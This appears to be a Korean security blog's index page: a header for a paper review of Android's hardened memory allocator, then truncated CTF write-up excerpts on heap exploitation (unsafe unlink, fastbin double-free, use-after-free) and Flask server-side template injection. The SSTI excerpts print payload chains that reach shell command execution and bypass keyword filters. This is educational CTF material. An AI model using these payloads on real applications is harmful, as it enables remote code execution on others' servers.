[Paper Review] Exploiting Android’s Hardened Memory Allocator
저자 Philipp Mao et al. 연도 2024 게재처 USENIX WOOT 유형 attack URL https://www.usenix.org/conference/woot24/presentation/mao Introduction 최근 많은 메모리 오염 취약점은 […]
저자 Philipp Mao et al. 연도 2024 게재처 USENIX WOOT 유형 attack URL https://www.usenix.org/conference/woot24/presentation/mao Introduction 최근 많은 메모리 오염 취약점은 […]
unsorted bin attack을 활용하여 특정 전역변수의 값을 조작할 수 있는 문제이다. unsorted bin attack 참고 → 먼저
heap의 unsafe unlink를 이용하여 풀라는 것 같다. 먼저 문제 코드를 보자. 이 문제는 실제 allocator의 api인 free를 통한 unlink를
Fastbin을 통해 Double-Free를 일으켜서 원하는 곳에 heap chunk를 할당시키는 공격을 사용한다. 먼저 문제 코드를 보자. 몇가지 기능들이 있는데
Use-After-Free(이하 UAF) 취약점을 활용한 문제이다. UAF는 말 그대로 특정 객체를 free한 다음에, 해당 객체를 가리키던 포인터를 사용하여 객체가 있던 부분에
계산기가 있다. render_template_string을 쓰고 있다. → SSTI!! ‘ ” _ [ ] , ` sys os flag % class config
render_template_string을 쓰고 있으므로 ssti임을 알 수 있다. 7*7을 넣어보면 49가 나온다. ‘’.__class__ ‘’.__class__.__mro__ ‘’.__class__.__mro__[1] ‘’.__class__.__mro__[1].__subclasses__() ‘’.__class__.__mro__[1].__subclasses__().__getitem__(398) ‘’.__class__.__mro__[1].__subclasses__().__getitem__(398)(’ls’,shell=True,stdout=-1) 까지 순서대로
메모가 있다. 여러가지 필터링이 존재한다. 게다가 args도 막힌다. |join으로 하는 것도 못한다. request|attr((’ar’,’gs’)|join)|attr(’a’) request|attr(%27arx67s%27) g를 x67로 넣어주니 된다!!!! request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27)}}&c=_
뭔가를 작성할 수 있는 노트가 있다. 작성하면 token이 생긴다. 노트에 img 태그까지 넣을 수 있다. 해당 url에 직접 접근하면 note의